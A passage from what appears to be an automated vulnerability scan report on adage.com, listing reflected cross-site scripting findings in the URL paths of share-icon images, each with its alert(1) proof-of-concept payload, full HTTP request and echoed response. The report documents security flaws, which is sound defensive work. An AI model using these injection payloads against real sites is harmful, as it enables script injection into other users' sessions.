Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=362CA96EB74BCDA656F3458E8FAA7FFE9022CEDF; path=/
Set-Cookie: HMAC=D2A70B3B6F2D627B1CF791FBD8AABF72580161D9; path=/
Set-Cookie: HMAC=56BE619682B95C7B39BA8A91499C3F25EAD08183; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-linkedin.png56556"-alert(1)-"6b88251e67d"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.28. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-netvibes.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9013f"-alert(1)-"1cee8c0ee9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images9013f"-alert(1)-"1cee8c0ee9f/save-and-share-icons/icon-netvibes.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=73D8C798EA35BDFF5FEF8D39C74DB99D5E721631; path=/
Set-Cookie: HMAC=25A02705D9075DDA484F5353B5F7C492E9483189; path=/
Set-Cookie: HMAC=554899B43EF275815F2646FADC65809B0EE347A9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images9013f"-alert(1)-"1cee8c0ee9f/save-and-share-icons/icon-netvibes.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.29. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-netvibes.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cd9a"-alert(1)-"4fcb73030b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons6cd9a"-alert(1)-"4fcb73030b2/icon-netvibes.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E342A8845C88713B81D977581A7D63D2FC7A20FB; path=/
Set-Cookie: HMAC=6B0E7D69E94126D64D3329417CBF65F22F2BDC11; path=/
Set-Cookie: HMAC=80B3B97FE86F7CDC9AC18C9FD7380AEE9F1A95F9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons6cd9a"-alert(1)-"4fcb73030b2/icon-netvibes.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.30. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-netvibes.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6b3"-alert(1)-"1ea28baa207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-netvibes.png3f6b3"-alert(1)-"1ea28baa207?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=767783B193E8D0DC66969E1FB28E77E7AA6E6989; path=/
Set-Cookie: HMAC=08993BCCA5393E57413B92AD16F4FF78A91C2157; path=/
Set-Cookie: HMAC=94AEC6726A6669DEFD6DC09D3765DECC8CD48751; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-netvibes.png3f6b3"-alert(1)-"1ea28baa207"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.31. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-newsvine.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1928"-alert(1)-"498b288b29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagesd1928"-alert(1)-"498b288b29c/save-and-share-icons/icon-newsvine.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BFF1773CBD1401331E38D3002E202A8EDCC8C2A6; path=/
Set-Cookie: HMAC=0949AB8D107D4BD432DE4289A29F5E47982AEBED; path=/
Set-Cookie: HMAC=11D331257740316F08989A9640AC8CB7B23DF935; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagesd1928"-alert(1)-"498b288b29c/save-and-share-icons/icon-newsvine.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.32. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-newsvine.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e3d7"-alert(1)-"cd5633629a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons9e3d7"-alert(1)-"cd5633629a9/icon-newsvine.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EE6BABB7E28048369428274FC9041746349D3CB7; path=/
Set-Cookie: HMAC=F1F02E5A35071CC4E1A19AAC9FA98441C3332201; path=/
Set-Cookie: HMAC=C7CBFAB5E1129988854DD5219C9FC26B0E00D705; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons9e3d7"-alert(1)-"cd5633629a9/icon-newsvine.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.33. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-newsvine.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93015"-alert(1)-"214765a46a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-newsvine.png93015"-alert(1)-"214765a46a2?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B909C3437866586FD17CD7C7280B4574F71AFAE6; path=/
Set-Cookie: HMAC=D4B1B00F32769F1F5BB9DC7EE43D6D6D3585CB7F; path=/
Set-Cookie: HMAC=68D1AF8AADFA2386BD43FEC50632177CA8E44BF3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-newsvine.png93015"-alert(1)-"214765a46a2"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.34. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-reddit.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62600"-alert(1)-"64c1d70f5ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images62600"-alert(1)-"64c1d70f5ee/save-and-share-icons/icon-reddit.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E53B256FC3646C8713A7559CDCA6504D5F107FAF; path=/
Set-Cookie: HMAC=9B2C2EF38120BE847E5996FFA47502EE868AB9D6; path=/
Set-Cookie: HMAC=667937EC16296BDABB46CB4BAC3A3F3DBC15F2C7; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images62600"-alert(1)-"64c1d70f5ee/save-and-share-icons/icon-reddit.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.35. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-reddit.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f62d4"-alert(1)-"b058ff9b208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconsf62d4"-alert(1)-"b058ff9b208/icon-reddit.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=63AAEFC95E8AA1063B6F1566ED2B3871E3A95350; path=/
Set-Cookie: HMAC=60A52D5EC992DDBA9ADDAACFB8E133A339C01D87; path=/
Set-Cookie: HMAC=863B683D89A94AF284D78A58FBECF879D8CF3987; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconsf62d4"-alert(1)-"b058ff9b208/icon-reddit.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.36. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-reddit.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68891"-alert(1)-"8062c447371 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-reddit.png68891"-alert(1)-"8062c447371?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=02375A16C5DABCA9F1B8426F789E8C218D3C16A8; path=/
Set-Cookie: HMAC=09F8CFEC2A615A5C1648CE0DD39E150A722FF4DA; path=/
Set-Cookie: HMAC=891C51882C7388FAE7BD23AA3C1FEF291684577F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-reddit.png68891"-alert(1)-"8062c447371"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.37. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-stumbleupon.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e81"-alert(1)-"624d2126b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images23e81"-alert(1)-"624d2126b2f/save-and-share-icons/icon-stumbleupon.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5F8D65ABDF28B4A2E17E72191E969F212A7E331F; path=/
Set-Cookie: HMAC=ADCE4AD4408BBA2FA183B5C22DBBDC199485F2AB; path=/
Set-Cookie: HMAC=CA185B63667609BA6ABB91FE024606DF9473F7D7; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
